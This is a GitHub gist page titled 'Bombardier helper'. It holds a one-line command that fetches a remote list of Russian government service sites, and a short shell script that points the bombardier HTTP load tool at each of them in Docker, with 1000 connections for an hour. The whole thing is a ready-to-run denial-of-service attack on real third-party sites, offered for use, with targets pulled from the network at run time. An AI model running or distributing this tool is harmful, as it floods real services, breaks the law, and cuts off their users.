Skip to content

Instantly share code, notes, and snippets.

@droopy4096
Created March 1, 2022 01:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save droopy4096/4b378da11dc67bde36065e00f4b824ac to your computer and use it in GitHub Desktop.
Save droopy4096/4b378da11dc67bde36065e00f4b824ac to your computer and use it in GitHub Desktop.
Bombardier helper
sh ./bombarder.sh $(curl -s https://raw.githubusercontent.com/droopy4096/stoppropaganda/external-json/data/ru_gosuslugi.json | jq -r '. | keys[]')
#!/bin/sh
for site in "$@"
do
docker run -d -ti --rm alpine/bombardier -c 1000 -d 3600s -l $site
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment